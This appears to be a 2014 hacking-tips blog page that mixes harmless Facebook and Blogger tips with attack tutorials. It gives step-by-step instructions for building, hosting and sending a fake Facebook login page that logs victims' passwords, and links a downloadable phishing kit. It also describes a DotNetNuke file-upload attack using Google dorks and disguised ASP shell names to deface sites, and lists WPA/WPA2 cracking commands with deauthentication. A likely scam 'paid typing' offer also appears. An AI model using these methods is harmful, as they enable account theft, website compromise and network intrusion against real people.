About

Friday, 30 May 2014

Hack a Facebook account with Phishing page

Phishing method is one of the most used ways to hack a Facebook account, but it isnt the easiest way but works 100%. You will get your victims credentials to login any online accounts. So if you dont have the Email address used to login your target Facebook, this method is the best way to hack someones Facebook account password. You can use Phishing page to hack other accounts i.e. Gmail, Hotmail, Yahoo, Twitter, Skype,...


1. What is Phishing?

Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details and sometimes, indirectly, money. Phishing is usually made through email which takes you to a site where your personal information is requested.
In order to create a Phishing page, you need 3 files:
  • A .html file: a fake login page of the site you want to get your victims credentials. Here we need to create a fake Facebook login page to hack a Facebook account.
  • A .php script file: which will post the data into a text file.
  • A .txt file: a file to store your victims credentials.

2. How to create a Facebook Phishing page?

Before learning how to hack a Facebook account, we will guide you how to create a Phishing page.
First, create a .html file. Go to the Facebook login page, right-click and copy and paste the page source of this page to a new Notepad file saved as "facebook.html"
We need to replace the URL of the Facebook login page (which is bordered with red in the image below) with "facebook.php".
How to create a Phishing page
Second, create a .php file. Open the Notepad, enter the code below and save as "facebook.php". After your victim enters his username and password on the Phishing link, he will be redirected to the official Facebook login page and his credentials will be stored in "password.txt" file.
Hack a Facebook account using Phishing
Third, create a .txt file. Just open a new Notepad file and save it as "password.txt". Now zip all 3 files to a .zip file.

How to hack a Facebook account?

Step 1: Upload all the 3 files created above to a free hosting site.
First, search for a free hosting site on the Internet. You can use 1freehosting, 2freehosting or any other free hosting sites.
Second, register for a new account. You should choose the similar name to Facebook or anything you like because we will shorten the URL link before sending to the victims.
Finally, upload the zip file. Just click to "Import Website". After that, you will have 3 files on your free hosting account
Hack a Facebook Password

Step 2: Send your victim the Facebook Phishing URL link.
First, shorten the Facebook Phishing URL link by using an online shorten tool on the Internet. The Facebook Phishing URL link should be in form of "yoursite.com/facebook.html".
Second, send your vicitm the fake login page. This is the most important step: you need to persuade your victim enter his/her credentials to the fake login page.
Finally, login your free hosting account, open the "password.txt" file to get your victims Email address and password to login Facebook

Hacking Facebook with Javascript Codes

==Hacking Facebook with Javascript Codes:==
Because facebook relies so heavily on javascript, and because we can type javascript into the address bar, that means we can “poke” into the workings of facebook to do things that we wouldn’t normally be able to do. It’s not “hacking” exactly, but it employs the same sort of skills hackers use when looking into applications. The best part is that because it’s all using the same control codes (or “API”) that facebook uses, there’s no way for facebook to find out you’re doing it, so it’s totally safe! (I think…) Besides, we’re not going to be doing anything toododgy, just a few little tweaks
Facebook Hack: Sending your friends offline
Here’s a funny one; if you’re chatting to a friend, get them to paste the following code into their facebook address bar:
javascript:buddyList.toggleTab();
It’ll make them go offline! Of course it’s not permanent, they can go back online by clicking the icon as normal, or by giving the same command again
Facebook Hack: Change facebook color
Isn’t that cool? Just use the following code to get your profile colour changed and impress your friends!
javascript:void(document.getElementById('headNavOut').style.backgroundColor="red");
Of course, you can use any colour you like; green, yellow,orange, black. It’s also fun to change it to “white” so you can’t see the text. Muahahaha. Again, only you can see it, but it does last until you log out or view certain special pages.
Facebook Hack: Get Chat History Even When Friends Aren’t Online
New: Video Tutorial for this hack.
Here’s a facebook hack that’s actually proven very useful to me in the past. One thing that I find annoying about facebook is that you can’t retrieve chat history if your buddy is offline… well now you can!
Click onto your friend’s profile page and copy their facebook ID from the address bar; i.e. the number after “id=”
It might look slightly different, perhaps like this: http://www.facebook.com/home.php#/profile.php?id=123132132213&ref=nf
But the important thing is to copy the number of the user, in our case 123132132213
Then while you’re still on facebook, type this into the address bar:
javascript:buddyList.itemOnClick(123132132213);
(with the correct ID of course)
And their chat window will pop up, saying “Jimbo is offline”. And if there’s any chat history, it will be displayed. How neat is that!
You can even open a chat window to yourself by pasting your own ID into the javascript, as seen to the right. You can use it for little notes to yourself, but remember that facebook chat history is cleared every few days, so don’t rely on it.
UPDATE1: A few people have had trouble pasting it in correctly, so here’s how it should be>javascript:buddyList.itemOnClick(123132132213)
UPDATE2: Now that we have facebook usernames, it can be little harder to determine the ID of a profile, but it’s still possible – here’s one way: right click the “see all” friends link and choose “copy link location”,
choose “open link in new tab”. The resulting URL will look something like this:
http://www.facebook.com/friends/?id=YOUR_ID_HERE&view=everyone
That’s it!
Facebook Hack: Change your name (temporarily)
This one’s a very simple hack that you can apply to any website. As you saw in the screenshot above, I’d changed my facebook to display as “Facebook | Leet Hax0r”. You can do this by using the following javascript:
javascript:void(document.title="Facebook | Neo");
Sadly, your friends will only see your actual name, not the new one, but it can make for some amusement in a computer lab class or anywhere where you can show people face to face.
Facebook Hack: Close chat windows
If you’re chatting to a friend and want to close the window, sure you can just click the ‘x’ in the top corner, but isn’t it cooler to do it with javascript? Well no not really, but if you can trick your friend into typing the following code in, you can close the chat window of anyone they’re chatting to:
javascript:chatDisplay.tabs[123132132213].tabXOnClick();
That will close my chat with “123132132213″. You can send your friends that link with your own facebook ID in it, and it’ll close their chat window with you! And if you happen to know that ID:123 is chatting with ID:321, you can send the following to ID:123, and when they paste it in it’ll close their chat with 321!
javascript:chatDisplay.tabs[321].tabXOnClick();
Other Facebook Hacks
The hacks above are the most impressive, but there are a few other little things you can do which are mildly interesting:
Bring up notifications:
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
Bring up online friends list:
javascript:buddyList.toggleTab();
Bring up application tab:
javascript:applicationDock.toggleTab();
Make text bold or underlined in facebook chat: use *stars* for bold text, and _underscores_ for underlined. There is no way to get italic text on facebook; see my comment here about facebook chat italics.

Code to invite all friends to a event/page

NEW METHOD: WORKING AND VERY EFFICIENT!
Instructions:
1. Click Invite Friends on whatever you are inviting people to
2. In the dropdown next to the search box, click Search All Friends
3. Scroll ALL the way down until names stop loading (I found it easy to click the first name and then hold down the spacebar or Page Down button)
4. For EVENTS Copy this code:
javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()}
For PAGES Copy this code:
javascript:var inputs = document.getElementsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
inputs[i].click();
}
For Chrome:
5. Press F12 on your keyboard and click the "Console" tab
6. Paste the code into the box at the bottom and press enter
7. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.
For Firefox:
5. Press CTRL + Shift + K
6. Paste the code into the box at the bottom and press enter.
7. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.
For Internet Explorer:
5. Press F12 on your keyboard
6. Click the "Console" tab
7. Paste the code into the box at the bottom and press enter.
8. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.

Making Facebook Phishing Site Tutorial


In my previous article I taught you people how use a software Super Phisher. ( The articles is here ). Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to register an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)



Step 2: Now Go to your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE (http://www.mediafire.com/?klq1vak76bouzrw ) .


Step 4: Now Go to http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.



Step 6: Now Click on the Public_html.



Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.


Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected. 


NOTE::: To access the input data ( Usernames and Password ) Go to the Following Address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s
PS:> If www.p4o.net didn't worked for you, you can use

Get Tricks to Hack FB account

A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.
By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.

How To Download Facebook Photo Albums

FacePAD: Facebook Photo Album Downloader allows you to download your friends’ facebook albums, Events albums, and Group Albums, en masse, with the click of a button.

How To Hack Any Computer With Just A IP

How To Hack Any Computer With Just A IP
Salam and welcome to my tutorial on how to hack any computer with just a IP.

In this tutorial you'll need

- Metasploit
- postgresql

Also: This only works on unpatched computer clients. So this tutorial will not work everytime, depending on the type of PC you're going to hack.

Metasploit is constantly updated, and there are in fact working remote exploits for newer OSes in it.
HOWEVER, not all systems will be vulnerable due to a router, firewall, or something else in the way.
Furthermore, a fully patched system will of course be safe against MSF, as MSF is a public tool using a collection of public exploits.

Make sure you download the right programs with your OS system. ( The one which you're currently supporting on your PC )

1. First you want to open up postgresql

Once it's open click
Code:
Start --> All Programs --> PostgreSQL 9.0 --> pgAdmin III
Then right click on your server and click connect. Remember to keep this open the whole time, otherwise it will fail and you'll have to restart again.

How to safe our Facebook Account from Facebook Hackers


How to safe our Facebook Account from Facebook Hackers?

Are you afraid of someone who hacks your Facebook account? Yes you are at the right place. Just go through the following steps.
Before getting entered into the steps just read the lines which are given below:
How to safe your Facebook account?
If you are entering into facebook.com you can see the normal http protocol which sends an unsecure username and password to the server in online by unencrypted form. But replacing http by https, it means "secure" protocol in which the password you have type will be send full secured encrypted form. This is the difference between http and https.
Yes, you may ask how to change the facebook account in a secure form that is https.
Just follow the steps:
step 1: Open your facebook account.
step 2: go to account settings and click security tab which is seen at the left side of the window.
step 3: Under security settings click edit button of Secure Browsing tab
step 4: You can see the check box displaying "Browse Facebook on a secure connection (https) when possible". Check the box and click save changes button.
step 5: That’s it. Your facebook account is now safety..!

How to Get Facebook Email Address

Facebook has just new features in which it will give email addresses to users ,at this time facebook email id is not open to everyone ,you have to request invittation.In order to get a invite to this new service you need to visit following  link where in you would be asked to click on the ‘Request Invite’ button.
http://www.facebook.com/about/messages/




Facebook-email-address-Invite
Facebook-email-Invite
if you are lucky you will get the yourname@facebook.com email id as soon as possible .Please note that Your email address will match your public username, for example:
Profile: facebook.com/username
Then your email address will be
Email: username@facebook.com
If you don’t have a username you can go here facebook.com/username/ to get or click below
http://www.facebook.com/username/

How To Hack WiFi Password On Backtrack 5r3

This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file
The commands which we will need in wpa\wpa2 cracking are as under:
1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )
Process . . . .
1= Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
2= Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
3= Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
4= Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
5= Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
6= Now type sixth command :
NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown)
Hope all of you get it. If any problem ask me  facebook

DNN Attack For Beginners

What Is DNN ?

DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading
vulnerrability.

Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks :
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

I got a target
 
Select "File" from list.
The in url bar paste the javascript ;
javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a uploading bar on page. As seen be below :
Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"

Now  you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!

Google Adsence in Urdu

Download Full Course Of Google Adsence in Urdu..!
Course Language: Urdu
Size: 04.06 MB

Make Money Online By Typing


Dear internet user, 
      You can make money online all over the world.You can join us free. No any investment is required for this assignment. It is the best typing job. You will type different words appearing on your computer screen. One word  or a set of two words is called one entry. We pay you for number of your correct entries. There is no time limit for work. All  payments  are quick & guaranteed. Most payments in Pakistan are transferred through Telenor Easypaisa.

 About Payment
** Our minimum   payout $3
** Payment via   Easy Paisa

** Payment via  BankOnline
** We'll pay within  3-4 days
** We're paying  since  2010

** Payments are guaranteed

Remember when you apply!
*  Read our Terms of Service Carefully & then submit  your application.
*  You  will get account details & Login Link in 48 hrs by Email or  SMS.
*  Please enter your contact information correctly to get a free  account. 
Note!If you get any problem, feel easy to write at : join.ptw@gmail.com

How To Make Your Blogger Look Like A Website

Blogs vs Websites

Some people are very happy to use Blogger to make a blog, that is, website that looks like a diary or journal that they write in regularly.

But a common question is "how to I make my blog into a real website, just like "someone" has done over at "this website"?

This isn't easy to answer:  Not everyone means the same thing when they say "real website".  "Someone" might have just changed the background image, installed a third-party template, changed a few settings - or re-written the entire Blogger template!  They may have just made the blog look more professional than the basic templates do - or maybe they've removing all "blog" features so that the site is like a regular brochure website.

The bottom-line is that, even with no changes a blog is a "real website", because it's got:
  • An url (www.your-blog-name.blogspot.com)
  • A space on the internet that's dedicated just to it. (For Blogger users, that space is inside Google's servers - we don't have to pay for our own hosting).
  • Web-pages, made in HTML, which visitors can look at using a web-browser (eg Internet Explorer, Firefox, Chrome, Safari, etc)

And there are some sites which are not at all ashamed to look like blogs, for example:

This article from Blogger Buster lists a 100 others - and I'm sure that there are plenty of popular non-English language sites that look like blogs, too.

But there are many other sites that have had some or all of their Blogger features hidden, for example

You need to do more work to make the second type of site - and even then, if a knowledgeable visitor looks at the source-code for a page, they can still tell that you're using Blogger.   So, usually, I'd recommend that you focus on what you want to achieve with the site, rather than "getting rid of blogger".

That said, here is a lit of things that you may want to to do to "turn your blog into a website".   They are in, roughly, the order that I recommend doing them to have the maximum effect.


Initial steps to reduce the "bloggy" feeling


1)   Get a custom domain

This is a website address like  www.mySite.com  or  www.yourBlog.org - or whatever available name that you choose.

Using a custom domain means that your address will not have "blogspot.com" in it.

You can do this either:

This step is essential if you don't want the site to be perceived as blog, because the address is what people see when they first find the site in search-engine results.

If you are going to get a custom-domain, then I strongly recommend doing it at the very beginning of setting up your blog, so all the later steps are based on the custom-domain name rather than re-directions.  This is is A Good Thing for SEO - and even if SEO doesn't matter for your blog initially it may become important later on.


2)    Turn off the navBar, and remove the space where it used to be


3)   Show only 1 post on the main page.


4)   Hide the "blog-specific" values from posts, on the Layout > Blog post (edit) tab.  

At a minimum the things to turn off are:
  • Post-date
  • Posted-by
  • Post-time
  • Comments
  • Links to this post
  • Labels
  • Reactions
  • Email post links
  • Post sharing

5)    Make a home page - ideally using the custom-redirect option


6)    Remove the attribution gadget (the bit where it says "Powered by Blogger")


7)    Remove the "subscribe to posts (atom)" link


8)    Add an RSS-subscription gadget using Feedburner.
Some people say this is optional - but I believe that all "proper" websites offer an RSS feed and show that they do so by using a feedburner-style RSS chiclet.   If you just add Blogger's Subscribe gadget instead, it gives the Atom - ie blog-style feed.


Banishing the Blogger look for good

These next steps really go together: if you do one, you need to do the others too. They are needed if you totally want to remove the blog-ish-ness:


9)     Remove all gadgets that show a list of posts. These include the Archive, Labels.  This is simply the reverse of the add-a-gadget procedure - edit the existing gadget, and click Remove.


10)   Remove the "older posts / home / newer posts" links.


11)   Set up your own navigation system: every post or page needs to be able to be accessed from either a button or a link that is in either a gadget or another post/page.

It's temping to think about navigation from the home page. But first-time visitors who come to your site from search-results will not arrive at the home page. They might not even think to look at the home page. Ideally your navigation system should offer several routes to get to every piece of information, and should include both logical links between posts and a search-based option.

Tools that you might use to help with this:
  • Summary posts, with links to detail pages about the topic. (Eg my public-transport site has a "city buses details" page, which links to individual route maps)
  • A menu bar with links to the most-important summary posts.
    NB  If you use the Pages gadget for this, it is automatically included if you give the site a mobile template which is an important step if you want the site to be responsive.
  • Linked-List gadgets to show summary posts, or lists of related detail posts, in the sidebar or footer.

An alternative to your own navigation system is to use categories to put your posts into pages. This doesn't fully reduce the bloggy feeling, since someone who looks at a page sees a list of posts (with just post-summaries if you've used jump-links).   However changing the the status message (the grey box that says "showing all posts with label whatever") can make this acceptable in some sites (ie ones where the line between blog and website is blurred).


What you (currently) cannot do

You cannot remove the post-date values from the URL of blog posts.
If your entire site could be done with 20 or fewer screens, you could use Pages for everything - but IMHO this isn't necessary, visitors don't seem to be overly spooked by URLs with numbers in them.

You cannot use a dynamic template 
If you want your site to look like a website, not a blog: you need to use a Designer, or possibly a Layout, template.


Other things that you might do

You might want your blog tostand out in the seach results in order to get more visitors - see Getting Started with SEO.

You might want to link it to the social networks - remember that there are wide range of possible links, and you need a strategy about how the site relates to each social medium that you use.


Have I missed anything?

I wrote this article  while I was setting up a site on which I want to minimise the "blog" look-and-feel, and I've tried to capture all the steps that I did.  

But maybe I've missed some things?   Maybe there are features that work differently on other templates.

What else would you do?

20 Facebook Tips/Tricks You Might Not Know

If you surf Facebook on daily basis or occasionally, chances are you’re already familiar with regular stuffs like add/delete friends, update statuses, walls and profile, add and explore pages & applications, etc, but there’s more..
This week we want to cover some interesting things you can do on (or with) Facebook; inclusive of tricks that are not documented or unknown to many, as well as tips to stay connected better with your friends. Without further ado, here’s 20 Facebook Tips/Tricks You Might Not Know. If you have interesting tips/tricks related to Facebook, please feel free to share in the comment box below.


  1. How to Place Facebook Chat On Firefox Sidebar

    If you are using Firefox, you can place the Facebook Chat at the sidebar.
    Facebook_Chat_Firefox_Sidebar
  2. How to Download Facebook Photo Albums

    FacePAD: Facebook Photo Album Downloader allows you to download your friends’ facebook albums, Events albums, and Group Albums, en masse, with the click of a button.
    facepad
  3. How to Share Flickr Photos to Facebook

    Flickr2Facebook is an unofficial Flickr to Facebook uploader(bookmarklet) which allows you upload photos to Facebook from Flickr.
    flickr2facebook
  4. How to Update Facebook without Using Facebook

    hellotxt and Ping.fm both introduced features that let Facebook administrators update Facebook Pages.
    hellotxt
  5. How to Schedule Facebook Messages

    Sendible lets you schedule Facebook messages ahead of time so you can send messages to your friends, customers or colleagues in the future.
    sendible
  6. How to "Friend" Someone on Facebook & Hide It From Your Status Updates

    A short tutorial on Makeuseof to guide you how to hide Facebook status updates and keep that fact confined to your closer friends.

  7. How to Create a Photo Collage Using Pictures of Your Facebook Friends

    Click on Friends tab. Proceed to More tab. From "Choose an option" dropdown, choose any of the dashes "" . Your Facebook friends collage is right on your computer screen.
    photo_collage
  8. How to Know When Facebook Friends Secretly Delete or Block You

    This service has been discontinued. X-Friends is a unique tool for tracking friends that disappear from Facebook.
    X-friends
  9. How to Display Selected Pictures Only on your Facebook Profile Page

    A little-known feature in Facebook that lets you decide who shows up in that Friends box. Click that "edit" pencil in your Friends box and type the names of your best friends in the box that says "Always show these friends"
    friend_photos
  10. How to Remove Facebook Advertisements

    This Greasemonkey script – Facebook: Cleaner removes many of the annoying ads and updates that unavoidably appear on your Facebook pages.
    ads
  11. How to Syncs Photos of Facebook Friends with Contacts in Microsoft Outlook

    OutSync is a free Windows application that syncs photos of your Facebook friends with matching contacts in Microsoft Outlook. It allows you to select which contacts are updated. So you can update all contacts at once or just a few at a time.
    outsync
  12. How to Display Facebook Statuses on WordPress Blog

    The following method make use of Facebook status feed and WordPress RSS widget to display Facebook Statuses on WordPress blog.. It will also work for self-host WordPress blogs.
    statuses
  13. How to Post Your Blog Posts to Your Facebook Wall Automatically

    Wordbook allows you to cross-post your blog posts to your Facebook Wall. Your Facebook “Boxes” tab will show your most recent blog posts.
    wordbook
  14. How to Access Facebook Chat on Desktop

    Gabtastik and digsby let you keep Facebook chat sessions open on your Windows desktop outside of your regular web browser, using minimal screen real estate and system memory.

  15. How to Create Quiz on Facebook Easily

    LOLapps provides quiz creator that can be employed to conjure up these popular personality quizzes that are so widespread in Facebook.
    lolapps
  16. How to Hide Your Online Status on Facebook Chat from Select Contacts

    Facebook has integrated friends list with Chat and you can also choose which of these list members get to see you online.
    hide
  17. How to Get Facebook Updates on Email

    NutshellMail consolidates your Facebook accounts through the inbox you use the most.
    nutshellmail
  18. How to Update Facebook Status from Firefox

    FireStatus is a status update utility for multiple social networks, including FaceBook.
    firestatus
  19. How to Get Facebook on Your Desktop

    Seesmic Desktop, Facebooker, Xobni, Facebook Sidebar Gadget, Scrapboy and Facebook AIR application are desktop applications that allows you interact with your stream just as you would on Facebook, but without the browser.

  20. How to Delete, Cancel and Terminate Facebook Account and Profile

    A simple guide to terminate, delete or cancel Facebook account, together with the Facebook profile easily.
    terminate

 

Subscribe to our Newsletter

Contact our Support

Email us: Support@templateism.com

Our Team Memebers